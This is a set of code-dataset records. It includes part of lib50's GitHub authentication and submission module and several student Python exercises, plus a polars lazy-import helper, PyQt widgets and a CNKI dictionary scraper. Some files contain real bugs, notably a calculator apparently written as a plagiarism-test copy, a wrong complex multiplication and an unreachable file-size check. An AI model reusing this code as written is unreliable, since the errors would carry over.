pexpect.TIMEOUT:\n logger.info(f\"command {command} timed out\")\n raise TimeoutError(timeout)\n\n return command_output\n\n\ndef _glob(pattern, skip_dirs=False):\n \"\"\"Glob pattern, expand directories, return all files that matched.\"\"\"\n # Implicit recursive iff no / in pattern and starts with *\n if \"/\" not 
in pattern and pattern.startswith(\"*\"):\n files = glob.glob(f\"**/{pattern}\", recursive=True)\n else:\n files = glob.glob(pattern, recursive=True)\n\n # Expand dirs\n all_files = set()\n for file in files:\n if os.path.isdir(file) and not skip_dirs:\n all_files.update(set(f for f in _glob(f\"{file}/**/*\", skip_dirs=True) if not os.path.isdir(f)))\n else:\n all_files.add(file)\n\n # Normalize all files\n return {str(Path(f)) for f in all_files}\n\n\ndef _match_files(universe, pattern):\n # Implicit recursive iff no / in pattern and starts with *\n if \"/\" not in pattern and pattern.startswith(\"*\"):\n pattern = f\"**/{pattern}\"\n pattern = re.compile(fnmatch.translate(pattern))\n return set(file for file in universe if pattern.match(file))\n\n\ndef get_content(org, repo, branch, filepath):\n \"\"\"Get all content from org/repo/branch/filepath at GitHub.\"\"\"\n url = \"https://github.com/{}/{}/raw/{}/{}\".format(org, repo, branch, filepath)\n r = requests.get(url)\n if not r.ok:\n if r.status_code == 404:\n raise InvalidSlugError(_(\"Invalid slug. Did you mean to submit something else?\"))\n else:\n # Check if GitHub outage may be the source of the issue\n check_github_status()\n\n # Otherwise raise a ConnectionError\n raise ConnectionError(_(\"Could not connect to GitHub. Do make sure you are connected to the internet.\"))\n return r.content\n\n\ndef check_github_status():\n \"\"\"\n Pings the githubstatus API. Raises an Error if the Git Operations and/or\n API requests components show an increase in errors.\n \"\"\"\n\n # https://www.githubstatus.com/api\n status_result = requests.get(\"https://kctbh9vrtdwd.statuspage.io/api/v2/components.json\")\n\n # If status check failed\n if not status_result.ok:\n raise ConnectionError(_(\"Could not connect to GitHub. Do make sure you are connected to the internet.\"))\n\n # Get the components lib50 uses\n components = status_result.json()[\"components\"]\n relevant_components = [c for c in components if c[\"name\"] in (\"Git Operations\", \"API Requests\")]\n\n # If there is an indication of errors on GitHub's side\n for component in components:\n if component[\"status\"] != \"operational\":\n raise ConnectionError(_(f\"Could not connect to GitHub. It looks like GitHub is having some issues with {component['name']}. 
Do check on https://www.githubstatus.com and try again later.\"))\n\n\ndef _lfs_add(files, git):\n \"\"\"\n Add any oversized files with lfs.\n Throws error if a file is bigger than 2GB or git-lfs is not installed.\n \"\"\"\n # Check for large files > 100 MB (and huge files > 2 GB)\n # https://help.github.com/articles/conditions-for-large-files/\n # https://help.github.com/articles/about-git-large-file-storage/\n larges, huges = [], []\n for file in files:\n size = os.path.getsize(file)\n if size > (100 * 1024 * 1024):\n larges.append(file)\n elif size > (2 * 1024 * 1024 * 1024):\n huges.append(file)\n\n # Raise Error if a file is >2GB\n if huges:\n raise Error(_(\"These files are too large to be submitted:\\n{}\\n\"\n \"Remove these files from your directory \"\n \"and then re-run!\").format(\"\\n\".join(huges), org))\n\n # Add large files (>100MB) with git-lfs\n if larges:\n # Raise Error if git-lfs not installed\n if not shutil.which(\"git-lfs\"):\n raise Error(_(\"These files are too large to be submitted:\\n{}\\n\"\n \"Install git-lfs (or remove these files from your directory) \"\n \"and then re-run!\").format(\"\\n\".join(larges)))\n\n # Install git-lfs for this repo\n _run(git(\"lfs install --local\"))\n\n # For pre-push hook\n _run(git(\"config credential.helper cache\"))\n\n # Rm previously added file, have lfs track file, add file again\n for large in larges:\n _run(git(\"rm --cached {large}\", large=large))\n _run(git(\"lfs track {large}\", large=large))\n _run(git(\"add {large}\", large=large))\n _run(git(\"add --force .gitattributes\"))\n\n\ndef _authenticate_ssh(org, repo=None):\n \"\"\"Try authenticating via ssh, if succesful yields a User, otherwise raises Error.\"\"\"\n # Require ssh-agent\n child = pexpect.spawn(\"ssh -p443 -T git@ssh.github.com\", encoding=\"utf8\")\n # GitHub prints 'Hi {username}!...' when attempting to get shell access\n try:\n i = child.expect([\"Hi (.+)! 
You've successfully authenticated\",\n \"Enter passphrase for key\",\n \"Permission denied\",\n \"Are you sure you want to continue connecting\"])\n except pexpect.TIMEOUT:\n return None\n\n\n child.close()\n\n if i == 0:\n username = child.match.groups()[0]\n else:\n return None\n\n return User(name=username,\n repo=f\"ssh://git@ssh.github.com:443/{org}/{username if repo is None else repo}\",\n org=org)\n\n\n@contextlib.contextmanager\ndef _authenticate_https(org, repo=None):\n \"\"\"Try authenticating via HTTPS, if succesful yields User, otherwise raises Error.\"\"\"\n _CREDENTIAL_SOCKET.parent.mkdir(mode=0o700, exist_ok=True)\n try:\n Git.cache = f\"-c credential.helper= -c credential.helper='cache --socket {_CREDENTIAL_SOCKET}'\"\n git = Git().set(Git.cache)\n\n # Get credentials from cache if possible\n with _spawn(git(\"credential fill\"), quiet=True) as child:\n child.sendline(\"protocol=https\")\n child.sendline(\"host=github.com\")\n child.sendline(\"\")\n i = child.expect([\"Username for '.+'\", \"Password for '.+'\",\n \"username=([^\\r]+)\\r\\npassword=([^\\r]+)\\r\\n\"])\n if i == 2:\n username, password = child.match.groups()\n else:\n username = password = None\n child.close()\n child.exitstatus = 0\n\n\n if password is None:\n username = _prompt_username(_(\"GitHub username: \"))\n password = _prompt_password(_(\"GitHub password: \"))\n\n # Check if credentials are correct\n res = requests.get(\"https://api.github.com/user\", auth=(username, password.encode('utf8')))\n\n # Check for 2-factor authentication https://developer.github.com/v3/auth/#working-with-two-factor-authentication\n if \"X-GitHub-OTP\" in res.headers:\n raise Error(\"Looks like you have two-factor authentication enabled!\"\n \" Please generate a personal access token (with GitHub's `repo` scope) and use it as your password.\"\n \" See https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line for more info.\")\n\n if res.status_code != 200:\n logger.info(res.headers)\n logger.info(res.text)\n raise Error(_(\"Invalid username and/or password.\") if res.status_code ==\n 401 else _(\"Could not authenticate user.\"))\n\n # Canonicalize (capitalization of) username,\n # Especially if user logged in via email address\n username = res.json()[\"login\"]\n\n # Credentials are correct, best cache them\n with _spawn(git(\"-c credentialcache.ignoresighup=true credential approve\"), quiet=True) as child:\n child.sendline(\"protocol=https\")\n child.sendline(\"host=github.com\")\n child.sendline(f\"path={org}/{username}\")\n child.sendline(f\"username={username}\")\n child.sendline(f\"password={password}\")\n child.sendline(\"\")\n\n yield User(name=username,\n repo=f\"https://{username}@github.com/{org}/{username if repo is None else repo}\",\n org=org)\n except BaseException:\n # Some error occured while this context manager is active, best forget credentials.\n logout()\n raise\n\n\ndef _prompt_username(prompt=\"Username: \"):\n \"\"\"Prompt the user for username.\"\"\"\n try:\n username = input(prompt).strip()\n while not username:\n print(\"Username cannot be empty, please try again.\")\n username = input(prompt).strip()\n return username\n except EOFError:\n print()\n\n\ndef _prompt_password(prompt=\"Password: \"):\n \"\"\"Prompt the user for password, printing asterisks for each character\"\"\"\n print(prompt, end=\"\", flush=True)\n password_bytes = []\n password_string = \"\"\n\n with _no_echo_stdin():\n while True:\n # Read one byte\n ch = sys.stdin.buffer.read(1)[0]\n # If user 
presses Enter or ctrl-d\n if ch in (ord(\"\\r\"), ord(\"\\n\"), 4):\n print(\"\\r\")\n break\n # Del\n elif ch == 127:\n if len(password_string) > 0:\n print(\"\\b \\b\", end=\"\", flush=True)\n # Remove last char and its corresponding bytes\n password_string = password_string[:-1]\n password_bytes = list(password_string.encode(\"utf8\"))\n # Ctrl-c\n elif ch == 3:\n print(\"^C\", end=\"\", flush=True)\n raise KeyboardInterrupt\n else:\n password_bytes.append(ch)\n\n # If byte added concludes a utf8 char, print *\n try:\n password_string = bytes(password_bytes).decode(\"utf8\")\n except UnicodeDecodeError:\n pass\n else:\n print(\"*\", end=\"\", flush=True)\n\n if not password_string:\n print(\"Password cannot be empty, please try again.\")\n return _prompt_password(prompt)\n\n return password_string\n\n\n@contextlib.contextmanager\ndef _no_echo_stdin():\n \"\"\"\n On Unix only, have stdin not echo input.\n https://stackoverflow.com/questions/510357/python-read-a-single-character-from-the-user\n \"\"\"\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n tty.setraw(fd)\n try:\n yield\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n","sub_path":"myenv/lib/python3.7/site-packages/lib50/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":32982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
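The `Git` class in the lib50 record above is a small immutable command builder: each `set()` call returns a new object with one more `shlex`-quoted fragment, and calling the object renders the final `git ...` string. A minimal standalone sketch of the same pattern (the `Cmd` name and the example path are illustrative, not part of lib50):

```python
import shlex


class Cmd:
    """Toy version of lib50's chainable Git command builder."""

    def __init__(self, args=None):
        self._args = list(args or [])

    def set(self, template, **kwargs):
        # Quote every formatted value so paths with spaces survive the shell
        quoted = {k: shlex.quote(str(v)) for k, v in kwargs.items()}
        return Cmd(self._args + [template.format(**quoted)])

    def __call__(self, template, **kwargs):
        return "git " + " ".join(self.set(template, **kwargs)._args)


git = Cmd().set("-C {path}", path="/tmp/my repo")
print(git("fetch origin {branch}", branch="main"))
# -> git -C '/tmp/my repo' fetch origin main
```

Returning a fresh object from `set()` is what lets lib50 keep a base `git -C <area>` prefix around and derive one-off commands from it without mutating shared state.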
+{"seq_id":"262555964","text":"'''(https://classes.cs.uoregon.edu/19F/cis210/p31-fizzbuzz-F19.pdf)\r\nProject 3.1: Fizzbuzz\r\nCIS 210 F19\r\n\r\nAuthor: Erich Scheid\r\n\r\nCredit: N/A\r\n\r\nDesc.: Write a program that follows the rules of fizzbuzz (if %3 is\r\n 0 print 'fizz', if %5 is 0 print 'buzz', if %3 is 0 and %5 is 0\r\n print 'fizzbuzz', otherwise print the index).\r\n'''\r\ndef fb(n):\r\n '''(int) -> printed string(s)\r\n\r\n Takes an integer(n) and makes a list from one to n that\r\n follows the rules of fizzbuzz (if %3 is 0 print 'fizz',\r\n if %5 is print 'buzz', if %3 is 0 and %5 is 0 print 'fizzbuzz',\r\n otherwise print the index).\r\n\r\n >>> fb(5) | >>> fb(15) [starting at line 11]\r\n 1 | 11\r\n 2 | fizz\r\n fizz | 13\r\n 4 | 14\r\n buzz | fizzbuzz\r\n Game over! | Game over!\r\n '''\r\n for i in range(1, n + 1):\r\n output = ''\r\n \r\n if not i % 3:\r\n output = 'fizz'\r\n if not i % 5:\r\n output += 'buzz'\r\n if not output:\r\n output = i\r\n \r\n print(output)\r\n print('Game over!')\r\n return None\r\n","sub_path":"Week3/p31_fizzbuzz.py","file_name":"p31_fizzbuzz.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"570286635","text":"import csv\nimport re\n\nimport digital_land\n\n\nclass HarmoniserPlugin:\n organisation_uri = {}\n end_of_uri_regex = re.compile(r\".*/\")\n\n @digital_land.hookimpl\n def init_harmoniser_plugin(self, harmoniser):\n self.harmoniser = harmoniser\n\n for row in csv.DictReader(open(\"var/cache/organisation.csv\", newline=\"\")):\n if \"opendatacommunities\" in row:\n uri = row[\"opendatacommunities\"].lower()\n self.organisation_uri[row[\"organisation\"].lower()] = uri\n self.organisation_uri[uri] = uri\n self.organisation_uri[self.end_of_uri(uri)] = uri\n self.organisation_uri[row[\"statistical-geography\"].lower()] = uri\n if \"local-authority-eng\" in row[\"organisation\"]:\n dl_url = \"https://digital-land.github.io/organisation/%s/\" % (\n row[\"organisation\"]\n )\n dl_url = dl_url.lower().replace(\"-eng:\", \"-eng/\")\n self.organisation_uri[dl_url] = uri\n\n self.organisation_uri.pop(\"\")\n\n @digital_land.hookimpl\n def apply_patch_post(self, fieldname, value):\n if fieldname == \"OrganisationURI\":\n normalised_value = self.lower_uri(value)\n\n if normalised_value in self.organisation_uri:\n return self.organisation_uri[normalised_value]\n\n s = self.end_of_uri(normalised_value)\n if s in self.organisation_uri:\n return self.organisation_uri[s]\n\n self.harmoniser.log_issue(\n fieldname, \"opendatacommunities-uri\", normalised_value\n )\n return value\n\n @digital_land.hookimpl\n def set_resource_defaults_post(self):\n if \"entry-date\" in self.harmoniser.default_values:\n self.harmoniser.default_values[\n \"LastUpdatedDate\"\n ] = self.harmoniser.default_values[\"entry-date\"]\n\n if \"organisation\" in self.harmoniser.default_values:\n key = self.harmoniser.default_values[\"organisation\"].lower()\n if key in self.organisation_uri:\n self.harmoniser.default_values[\"OrganisationURI\"] = self.organisation_uri[key]\n\n def lower_uri(self, value):\n return \"\".join(value.split()).lower()\n\n def end_of_uri(self, value):\n return self.end_of_uri_regex.sub(\"\", value.rstrip(\"/\").lower())\n\n\n# regsiter plugin instances, not the classes themselves\nharmoniser_plugin = HarmoniserPlugin()\n","sub_path":"pipeline/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"367511437","text":"def biggest(*num):\n h = 0\n for c in num:\n if c > h:\n h = c\n print(f'In {num} {[len(num)]} the largest number is: {h}')\n\n\nbiggest(2, 9, 4, 7, 1)\nbiggest(4, 7, 0)\nbiggest(1, 2)\nbiggest(6)\nbiggest()\n\n\n\n\n","sub_path":"exercicosPython/exercises/ex001_114/ex099largest.py","file_name":"ex099largest.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"107915367","text":"import sys\nfrom PyQt5 import QtWidgets\n\nclass Pencere(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n def init_ui(self):\n self.yazi_alani=QtWidgets.QLabel(\"Bana Henüz Tıklanmadı\")\n self.button=QtWidgets.QPushButton(\"Bana Tıkla\")\n self.say=0\n\n v_box=QtWidgets.QVBoxLayout()\n\n v_box.addWidget(self.button)\n v_box.addWidget(self.yazi_alani)\n v_box.addStretch()\n\n h_box = QtWidgets.QHBoxLayout()\n\n h_box.addStretch()\n h_box.addLayout(v_box)\n h_box.addStretch()\n self.setLayout(h_box)\n\n self.button.clicked.connect(self.click)\n self.show()\n def click(self):\n self.say+=1\n self.yazi_alani.setText(\"Bana \"+str(self.say)+\" Defa Tıklandı\")\n\napp = QtWidgets.QApplication(sys.argv)\n\npencere=Pencere()\nsys.exit(app.exec_())","sub_path":"PyQt5/Fonksiyonel Buton.py","file_name":"Fonksiyonel Buton.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"568291146","text":"from __future__ import annotations\n\nimport inspect\nimport re\nimport sys\nfrom importlib import import_module\nfrom importlib.util import find_spec\nfrom types import ModuleType\nfrom typing import TYPE_CHECKING, Any\n\n_FSSPEC_AVAILABLE = True\n_NUMPY_AVAILABLE = True\n_PANDAS_AVAILABLE = True\n_PYARROW_AVAILABLE = True\n_ZONEINFO_AVAILABLE = True\n_HYPOTHESIS_AVAILABLE = True\n_DELTALAKE_AVAILABLE = True\n\n\nclass _LazyModule(ModuleType):\n \"\"\"\n Module that can act both as a lazy-loader and as a proxy.\n\n Notes\n -----\n We do NOT register this module with `sys.modules` so as not to cause\n confusion in the global environment. This way we have a valid proxy\n module for our own use, but it lives _exclusively_ within polars.\n\n \"\"\"\n\n _mod_pfx: dict[str, str] = {\n \"numpy\": \"np.\",\n \"pandas\": \"pd.\",\n \"pyarrow\": \"pa.\",\n }\n\n def __init__(\n self,\n module_name: str,\n module_available: bool,\n ) -> None:\n \"\"\"\n Initialise lazy-loading proxy module.\n\n Parameters\n ----------\n module_name : str\n the name of the module to lazy-load (if available).\n\n module_available : bool\n indicate if the referenced module is actually available (we will proxy it\n in both cases, but raise a helpful error when invoked if it doesn't exist).\n\n \"\"\"\n self._module_available = module_available\n self._module_name = module_name\n self._globals = globals()\n super().__init__(module_name)\n\n def _import(self) -> ModuleType:\n # import the referenced module, replacing the proxy in this module's globals\n module = import_module(self.__name__)\n self._globals[self._module_name] = module\n self.__dict__.update(module.__dict__)\n return module\n\n def __getattr__(self, attr: Any) -> Any:\n # have \"hasattr('__wrapped__')\" return False without triggering import\n # (it's for decorators, not modules, but keeps \"make doctest\" happy)\n if attr == \"__wrapped__\":\n raise AttributeError(\n f\"{self._module_name!r} object has no attribute {attr!r}\"\n )\n\n # accessing the proxy module's attributes triggers import of the real thing\n if self._module_available:\n # import the module and return the requested attribute\n module = self._import()\n return getattr(module, attr)\n else:\n # user has not installed the proxied module\n if re.match(r\"^__\\w+__$\", attr):\n # allow some minimal introspection on private module\n # attrs to avoid unnecessary error-handling elsewhere\n return None\n\n # all other attribute access raises a helpful exception\n pfx = self._mod_pfx.get(self._module_name, \"\")\n raise ModuleNotFoundError(\n f\"{pfx}{attr} requires '{self._module_name}' module to be installed\"\n ) from None\n\n\ndef _lazy_import(module_name: str) -> tuple[ModuleType, bool]:\n \"\"\"\n Lazy import the given module; avoids up-front import costs.\n\n Parameters\n ----------\n module_name : str\n name of the module to import, eg: \"pyarrow\".\n\n Notes\n -----\n If the requested module is not available (eg: has not been installed), a proxy\n module is created in its place, which raises an exception on any attribute\n access. 
This allows for import and use as normal, without requiring explicit\n guard conditions - if the module is never used, no exception occurs; if it\n is, then a helpful exception is raised.\n\n Returns\n -------\n tuple[Module, bool]: a lazy-loading module and a boolean indicating if the\n requested/underlying module exists (if not, the returned module is a proxy).\n\n \"\"\"\n # check if module is LOADED\n if module_name in sys.modules:\n return sys.modules[module_name], True\n\n # check if module is AVAILABLE\n try:\n module_spec = find_spec(module_name)\n module_available = not (module_spec is None or module_spec.loader is None)\n except ModuleNotFoundError:\n module_available = False\n\n # create lazy/proxy module that imports the real one on first use\n # (or raises an explanatory ModuleNotFoundError if not available)\n return (\n _LazyModule(\n module_name=module_name,\n module_available=module_available,\n ),\n module_available,\n )\n\n\nif TYPE_CHECKING:\n import deltalake\n import fsspec\n import hypothesis\n import numpy\n import pandas\n import pyarrow\n\n if sys.version_info >= (3, 9):\n import zoneinfo\n else:\n from backports import zoneinfo\nelse:\n fsspec, _FSSPEC_AVAILABLE = _lazy_import(\"fsspec\")\n numpy, _NUMPY_AVAILABLE = _lazy_import(\"numpy\")\n pandas, _PANDAS_AVAILABLE = _lazy_import(\"pandas\")\n pyarrow, _PYARROW_AVAILABLE = _lazy_import(\"pyarrow\")\n hypothesis, _HYPOTHESIS_AVAILABLE = _lazy_import(\"hypothesis\")\n deltalake, _DELTALAKE_AVAILABLE = _lazy_import(\"deltalake\")\n zoneinfo, _ZONEINFO_AVAILABLE = (\n _lazy_import(\"zoneinfo\")\n if sys.version_info >= (3, 9)\n else _lazy_import(\"backports.zoneinfo\")\n )\n\n\ndef _NUMPY_TYPE(obj: Any) -> bool:\n return _NUMPY_AVAILABLE and any(\n \"numpy.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\ndef _PANDAS_TYPE(obj: Any) -> bool:\n return _PANDAS_AVAILABLE and any(\n \"pandas.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\ndef _PYARROW_TYPE(obj: Any) -> bool:\n return _PYARROW_AVAILABLE and any(\n \"pyarrow.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\n__all__ = [\n \"fsspec\",\n \"numpy\",\n \"pandas\",\n \"pyarrow\",\n \"deltalake\",\n \"zoneinfo\",\n \"_LazyModule\",\n \"_FSSPEC_AVAILABLE\",\n \"_NUMPY_AVAILABLE\",\n \"_NUMPY_TYPE\",\n \"_PANDAS_AVAILABLE\",\n \"_PANDAS_TYPE\",\n \"_PYARROW_AVAILABLE\",\n \"_PYARROW_TYPE\",\n \"_ZONEINFO_AVAILABLE\",\n \"_HYPOTHESIS_AVAILABLE\",\n \"_DELTALAKE_AVAILABLE\",\n]\n","sub_path":"mds_py/mds-env/lib/python3.11/site-packages/polars/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
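Stripped of the proxy-for-missing-modules machinery, the core of `_LazyModule` is simply "defer `import_module` until the first attribute access". A toy version of that idea (the `LazyProxy` name is made up; the real class additionally raises a helpful `ModuleNotFoundError` when the underlying module is absent):

```python
import importlib
from types import ModuleType


class LazyProxy(ModuleType):
    """Import the named module only when an attribute is first touched."""

    def __init__(self, name):
        super().__init__(name)
        self._name = name
        self._module = None

    def __getattr__(self, attr):
        # Only reached for attributes the proxy itself doesn't have
        if self._module is None:
            self._module = importlib.import_module(self._name)
        return getattr(self._module, attr)


json = LazyProxy("json")            # nothing imported yet
print(json.dumps({"lazy": True}))   # first access triggers the real import
```

Like the real implementation, the proxy is not registered in `sys.modules`, so it never shadows a genuine import elsewhere in the program.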
+{"seq_id":"112891479","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# =================================================\n# Trigger\n# - Author jouke hijlkema \n# - jeu. avril 13:53 2017\n# - Initial Version 1.0\n# =================================================\nfrom gi.repository import Gtk\nfrom .Counter import Counter\n\nclass tankDist(Counter):\n def __init__(self,parent,*args,**kw):\n \"docstring\"\n super(tankDist, self).__init__(parent,*args,**kw)\n self.parent = parent\n\n self.units = \"km\"\n self.update(0)\n self.Value.set_width_chars(4)\n self.Value.set_max_width_chars(4)\n\n self.reset = Gtk.Button.new_with_label(\"0\")\n self.reset.set_hexpand(True)\n self.add(self.reset)\n\n self.reset.connect(\"clicked\",self.myReset)\n\n ## --------------------------------------------------------------\n ## Description : chage the offset value\n ## NOTE : \n ## -\n ## Author : jouke hylkema\n ## date : 16-15-2017 12:15:52\n ## --------------------------------------------------------------\n def myReset (self,widget):\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.WARNING,\n Gtk.ButtonsType.OK_CANCEL, \"Reset tank ?\")\n rep = dialog.run()\n if rep == Gtk.ResponseType.OK:\n self.returnSignal.send(\"reset\")\n dialog.destroy()\n","sub_path":"GUI/Parts/tankDist.py","file_name":"tankDist.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"64791877","text":"#this version is taken from a theoretical copier who may have cheated from #test2.py, it posseses slight variations\nimport math\nres = 0\nsumma = 0\ncalcor = 0.0\naverage = 0\ncalculatorrunning = True\ndef main():\n while (calculatorrunning):\n handleInput(Menu())\n print(\"Thanks for completing my program!\")\ndef menu():\n global result\n print(\"Current Result:\", result)\n print(\"\")\n print(\"Calculator Menu\")\n print(\"---------------\")\n print(\"0. Exit Program\")\n print(\"1. Addition\")\n print(\"2. Subtraction\")\n print(\"3. Multiplication\")\n print(\"4. Division\")\n print(\"5. Exponentiation\")\n print(\"6. Logarithm\")\n print(\"7. Display Average\")\n print(\"\")\n menuanswer = int(input('Enter Menu Selection: '))\n return menuanswer\n\ndef handleInput(menuanswer):\n global result\n global calculatorrunning\n global sum, calcs, average\n if (menuanswer == 0):\n calculatorrunning = False\n return\n elif (menuanswer >= 1 and menuanswer <= 6):\n op1, op2 = getInputs()\n if (menuanswer == 1):\n result = op1 + op2\n elif (menuanswer == 2):\n result = op1 - op2\n elif (menuanswer == 3):\n result = op1 * op2\n elif (menuanswer == 4):\n result = op1/op2\n elif (menuanswer == 5):\n result = op1**op2\n elif (menuanswer == 6):\n result = math.log(op2, op1)\n elif (menuanswer == 7):\n print(\"\")\n if (calcs == 0):\n print(\"error: No calculations yet to average!\")\n else:\n print(\"sum of calculations:\", sum)\n print(\"number of calculations:\", calcs)\n if (isinstance(sum, complex)):\n print(\"Average of calculations:\", sum/float(calcs))\n else:\n print(\"Average of calculations:\", round(sum/float(calcs), 2))\n print(\"\")\n handleInput(int(input('Enter Menu Selection: ')))\n return\n else:\n print(\"\")\n print(\"Error: Invalid selection!\")\n print(\"\")\n handleInput(int(input('Enter Menu Selection: ')))\n return\n calcor += 1\n summa += result\n print(\"\")\n\ndef getInputs():\n op1 = input(\"Enter first operand: \")\n op2 = input(\"Enter second operand: \")\n if (op1 == \"RESULT\"):\n op1 = result\n op1 = float(op1)\n if (op2 == \"RESULT\"):\n op2 = result\n op2 = float(op2)\n return op1, op2\n\nmain()","sub_path":"source/test_files/test2copier.py","file_name":"test2copier.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"3556013","text":"\r\nclass complex_number:\r\n def __init__(self,x=0,y=0):\r\n self.x=x\r\n self.y=y\r\n\r\n def show(self):\r\n if self.y>0:\r\n print(self.x, '+', self.y, 'i')\r\n else:\r\n print(self.x, self.y, 'i')\r\n\r\n def sum(self,other):\r\n res=complex_number()\r\n res.x=self.x + other.x\r\n res.y=self.y + other.y\r\n return res\r\n\r\n def sub(self,other):\r\n res = complex_number()\r\n res.x = self.x - other.x\r\n res.y = self.y - other.y\r\n return res\r\n\r\n def mul(self,other):\r\n res = complex_number()\r\n res.x = ((self.x * other.x)-(self.y * other.y))\r\n res.y = ((self.x * other.y)+(self.y + other.x))\r\n return res\r\n\r\n\r\n\r\nwhile True:\r\n print('enter the complex number1 :')\r\n x1 = int(input())\r\n y1 = int(input())\r\n n1 = complex_number(x1 ,y1)\r\n n1.show()\r\n print('enter the complex number2 :')\r\n x2 = int(input())\r\n y2 = int(input())\r\n n2 = complex_number(x2, y2)\r\n n2.show()\r\n while True:\r\n print('choose:\\n1.add\\n2.sub\\n3.mul\\n4.exit\\n')\r\n c = int(input())\r\n if c==1:\r\n N=n1.sum(n2)\r\n N.show()\r\n if c==2:\r\n N=n1.sub(n2)\r\n N.show()\r\n if c==3:\r\n N=n1.mul(n2)\r\n N.show()\r\n if c==4:\r\n break\r\n e = input('Do you want to continue with other complex numbers? [y/n]')\r\n if e == 'n':\r\n break","sub_path":"mokhtalet.py","file_name":"mokhtalet.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"146143909","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# @Description:\n# @File: cnki_dict_words.py\n# @Project: ip_nlp\n# @Author: Yiheng\n# @Email: GuoYiheng89@gmail.com\n# @Time: 7/22/2019 9:27\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom utils import file_utils\n\nbase_url = 'http://dict.cnki.net/'\ncatalogue_url = 'http://dict.cnki.net/dict_sub.aspx'\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/71.0.3578.98 Safari/537.36'}\n\n\ndef get_html(url):\n try:\n print('get html url is {}'.format(url))\n response = requests.get(url, timeout=20)\n if response.status_code == 200:\n return response.text\n except requests.RequestException:\n print('get html {} exception...'.format(url))\n return None\n\n\ndef get_categories_uri(html_text):\n soup = BeautifulSoup(html_text, features='lxml')\n filter_attrs = {'title': re.compile('.'),\n 'href': re.compile('html$')}\n\n a_tags = soup.find_all('a', attrs=filter_attrs)\n hrefs = [a_tag['href'] for a_tag in a_tags]\n # for href in hrefs:\n # print('href is {}'.format(href))\n return hrefs\n\n\ndef get_words_from_ctg(ctg_uris):\n for ctg_uri in ctg_uris:\n print('ctg uri is {}'.format(ctg_uri))\n ctg_pg0 = get_html(base_url + ctg_uri)\n\n page_count = get_page_count(ctg_pg0)\n for page_num in range(page_count):\n splits = ctg_uri.split('.')\n jump_uri = '%s_%d.html' % (splits[0], page_num + 1)\n ctg_page_uri = base_url + jump_uri\n ctg_page = get_html(ctg_page_uri)\n if ctg_page:\n yield get_words_from_ctg_page(ctg_page)\n\n\ndef get_page_count(ctg_pg0):\n soup = BeautifulSoup(ctg_pg0, features='lxml')\n page_info = soup.find('span', text=re.compile('^共.*')).text\n print('page info is {}'.format(page_info))\n # 共16页 共[306]词汇\n matcher = re.search('[0-9]+', page_info)\n\n return int(matcher.group(0)) if matcher else 0\n\n\ndef get_words_from_ctg_page(ctg_pg):\n soup = BeautifulSoup(ctg_pg, features='lxml')\n tr_tags = soup.find(id='lblcon').find_all('tr')\n words = [tr_tag.find_all('td')[1].a.text for tr_tag in tr_tags if not tr_tag.has_attr('class')]\n return words\n\n\nif __name__ == '__main__':\n html = get_html(catalogue_url)\n # print('text {}'.format(html))\n ctg_uris = get_categories_uri(html)\n words = get_words_from_ctg(ctg_uris)\n dict_cnki_path = 'F:/temp/ip_nlp/cnki_dict.txt'\n for word in words:\n # print(word)\n file_utils.save_list2file(word, dict_cnki_path)\n print('all task complete...')\n","sub_path":"src/crawlers/cnki_dict_words.py","file_name":"cnki_dict_words.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
